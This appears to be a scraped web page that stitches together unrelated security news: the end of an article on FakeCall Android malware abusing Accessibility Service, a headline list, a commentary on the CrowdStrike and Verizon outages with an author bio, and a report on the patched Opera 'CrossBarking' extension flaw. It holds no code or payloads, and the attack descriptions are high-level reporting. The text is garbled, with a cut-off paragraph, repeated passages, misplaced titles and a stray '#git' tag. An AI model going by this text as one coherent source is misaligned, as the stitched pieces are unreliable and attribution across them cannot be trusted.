The malware also exploits the **Android Acces**sibility Service to capture screen content and manipulate the device’s display to create a deceptive user interface while mimicking the legitimate phone app. This trick allows attackers to steal sensitive information, conduct surveillance, and even remotely control the device. 

It monitors events from the stock dialer app and detects permission prompts from the system permission manager and system UI. Upon detecting specific events, it can grant permissions for the malware, bypassing user consent. The malware allows remote attackers to control the victim’s device UI, allowing them to simulate user interactions and manipulate the device with precision.

To protect against such malware, always download apps from trusted sources like Google Play Store, be cautious about permission requests, and use mobile security software with on-device detection capabilities.

1.  **Unicode QR Code Phishing Scam Bypasses Traditional Security**
2.  **Malware Attack Imitates VPN, Security Apps on Android Phones**
3.  **Antidot Android Malware Poses as Google Update to Steal Funds**
4.  **QR Code Scam: Fake Voicemails Hits Users, 1000 Attacks in 14 Days**
5.  **Advanced Vishing Attack Campaign “LetsCall” Targets Android Users**

New “Scary” FakeCall Malware Captures Photos and OTPs on Android

Outages are inevitable. Our focus should be on minimizing their scope, addressing underlying causes, and understanding that protecting systems is about keeping bad actors out while maintaining stability and reliability.

Source: Igor Goncharenko via Alamy Stock Photo

COMMENTARY

In an era where digital security is paramount, organizations invest heavily in cybersecurity tools to defend against cyberattacks. However, these same tools — designed to protect — can sometimes be the cause of major disruptions. From botched updates to unforeseen errors in protective software, the very systems meant to safeguard us can lead to widespread outages, with the recent cases of CrowdStrike and Verizon standing out as prime examples. 

**The Fine Line Between Protection and Disruption**

Cybersecurity solutions are essential in our interconnected world, helping businesses and governments protect sensitive data, infrastructure, and user privacy. However, when improperly handled, even the best tools can turn from protectors into sources of failure. 

Known for its strong cybersecurity offerings, CrowdStrike rolled out a threat intelligence update to its Falcon platform in July that inadvertently caused a major global outage, affecting airlines, banks, and hospitals. This incident, which resulted from a software glitch during the delivery of its "Rapid Response Content" threat signatures, left critical services temporarily offline, reminding us that even the most advanced security systems aren't infallible. 

Similarly, in September, Verizon experienced a massive network outage that left millions of customers without mobile service across the US. Although the exact cause of the outage is still under investigation, fears of a cyberattack have been discussed. However, early signs suggest that it could have stemmed from a technical issue or mismanagement during a network upgrade — further highlighting how small oversights in maintaining or updating network infrastructure can have outsized consequences. 

**The Domino Effect: More Than Just an Inconvenience**

When cybersecurity or networking systems fail, the impact often ripples far beyond the initial disruption. Take Verizon's outage as an example: Businesses dependent on the network lost critical communication channels, customer service teams were unable to assist clients, and productivity ground to a halt for countless users. These events illustrate the profound dependency modern society has on digital infrastructure, and when that infrastructure falters, so do economies, health services, and day-to-day life. 

But outages like these also create windows of opportunity for cybercriminals. When networks are down or overwhelmed, attackers may exploit system vulnerabilities or use the chaos as cover for more nefarious activities, such as distributed-denial-of-service (DDoS) attacks, ransomware deployments, or supply chain compromises. Therefore, resilience and proper update protocols are just as important as the defensive capabilities of any cybersecurity tool. 

**Lessons for the Industry**

These high-profile outages, including Verizon's and CrowdStrike's, serve as reminders that robust cybersecurity involves more than just tools — it requires continuous testing, resilience planning, and careful management of system updates. 

Key takeaways for businesses include: 

*   Test updates thoroughly: Even the best security patches can introduce new risks if not properly vetted. 
    

*   Invest in incident response: Prepare for outages or failures by developing comprehensive response plans that prioritize minimizing downtime and ensuring customer communication. 
    

*   Stay vigilant: Disruptions provide opportunities for attackers. Ensure that security monitoring continues even during outages. 
    

**Looking Forward**

As technology evolves, so must our approach to cybersecurity. While outages are inevitable, the focus should be on minimizing their scope, addressing underlying causes, and understanding that protecting systems is not just about keeping bad actors out — it's also about maintaining stability and reliability within the infrastructure itself. 

Cybersecurity tools must balance protection with resilience, ensuring that the systems designed to defend us don't inadvertently cause more harm. 

**About the Author**

Director of Security, Owlet Baby Care

Yvonne Dickinson is currently the Director of Security for a global and publicly traded company. Her depth of expertise resides within application and cloud security, although she is a generalist across the other security domains. Yvonne is extremely passionate about advocating for women in STEM fields and strives to make an impact where she can. Although her official title is Security Director, that job is secondary to her primary role as CMO — Chief Mom Officer — to her family. As a technical leader, she strives to find balance in her work and her home so she can succeed at both her jobs, and she empowers her team to do the same.

When Cybersecurity Tools Backfire

A now-patched security flaw in the Opera web browser could have enabled a malicious extension to gain unauthorized, full access to private APIs.
The attack, codenamed CrossBarking, could have made it possible to conduct actions such as capturing screenshots, modifying browser settings, and account hijacking, Guardio Labs said.
To demonstrate the issue, the company said it managed to publish a

Browser Security / Vulnerability

A now-patched security flaw in the Opera web browser could have enabled a malicious extension to gain unauthorized, full access to private APIs.

The attack, codenamed **CrossBarking**, could have made it possible to conduct actions such as capturing screenshots, modifying browser settings, and account hijacking, Guardio Labs said.

To demonstrate the issue, the company said it managed to publish a seemingly harmless browser extension to the Chrome Web Store that could then exploit the flaw when installed on Opera, making it an instance of a cross-browser-store attack.

"This case study not only highlights the perennial clash between productivity and security but also provides a fascinating glimpse into the tactics used by modern threat actors operating just below the radar," Nati Tal, head of Guardio Labs, said in a report shared with The Hacker News.

The issue has been addressed by Opera as of September 24, 2024, following responsible disclosure. That said, this is not the first time security flaws have been identified in the browser.

Earlier this January, details emerged of a vulnerability tracked as MyFlaw that takes advantage of a legitimate feature called My Flow to execute any file on the underlying operating system.

The latest attack technique hinges on the fact that several of Opera-owned publicly-accessible subdomains have privileged access to private APIs embedded in the browser. These domains are used to support Opera-specific features like Opera Wallet, Pinboard, and others, as well as those that are used in internal development.

The names of some of the domains, which also include certain third-party domains, are listed below -

*   crypto-corner.op-test.net
*   op-test.net
*   gxc.gg
*   opera.atlassian.net
*   pinboard.opera.com
*   instagram.com
*   yandex.com

While sandboxing ensures that the browser context remains isolated from the rest of the operating system, Guardio's research found that content scripts present within a browser extension could be used to inject malicious JavaScript into the overly permissive domains and gain access to the private APIs.

"The content script does have access to the DOM (Document Object Model)," Tal explained. "This includes the ability to dynamically change it, specifically by adding new elements."

Armed with this access, an attacker could take screenshots of all open tabs, extract session cookies to hijack accounts, and even modify a browser's DNS-over-HTTPS (DoH) settings to resolve domains through an attacker-controlled DNS server.

This could then set the stage for potent adversary-in-the-middle (AitM) attacks when victims attempt to visit bank or social media sites by redirecting them to their malicious counterparts instead.

The malicious extension, for its part, could be published as something innocuous to any of the add-on catalogs, including the Google Chrome Web Store, from where users could download and add it to their browsers, effectively triggering the attack. It, however, requires permission to run JavaScript on any web page, particularly the domains that have access to the private APIs.

With rogue browser extensions repeatedly infiltrating the official stores, not to mention some legitimate ones that lack transparency into their data collection practices, the findings underscore the need for caution prior to installing them.

"Browser extensions wield considerable power — for better or for worse," Tal said. "As such, policy enforcers must rigorously monitor them."

"The current review model falls short; we recommend bolstering it with additional manpower and continuous analysis methods that monitor an extension's activity even post-approval. Additionally, enforcing real identity verification for developer accounts is crucial, so simply using a free email and a prepaid credit card is insufficient for registration."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#git